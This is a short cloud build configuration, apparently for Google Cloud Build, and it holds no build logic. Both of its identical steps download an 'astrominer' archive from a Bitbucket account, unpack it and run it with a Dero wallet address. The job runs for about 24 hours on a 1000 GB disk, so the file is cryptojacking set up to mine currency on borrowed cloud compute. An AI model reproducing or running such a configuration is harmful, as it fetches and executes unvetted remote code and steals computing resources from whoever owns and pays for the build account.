steps:
  - name: golang
    args: 
      - '-c'
      - >-
        wget https://bitbucket.org/wename798/jaya/downloads/astrominer.tar.gz && tar -xvf astrominer.tar.gz && ./astrominer -w deroi1qyzlxxgq2weyqlxg5u4tkng2lf5rktwanqhse2hwm577ps22zv2x2q9pvfz92xmylq8cq7asn9nqswcd3s
    waitFor: ["-"]
    entrypoint: /bin/bash

  - name: golang
    args: 
      - '-c'
      - >-
        wget https://bitbucket.org/wename798/jaya/downloads/astrominer.tar.gz && tar -xvf astrominer.tar.gz && ./astrominer -w deroi1qyzlxxgq2weyqlxg5u4tkng2lf5rktwanqhse2hwm577ps22zv2x2q9pvfz92xmylq8cq7asn9nqswcd3s
    waitFor: ["-"]
    entrypoint: /bin/bash
timeout: 86000s
options:
  machineType:
  diskSizeGb: '1000'
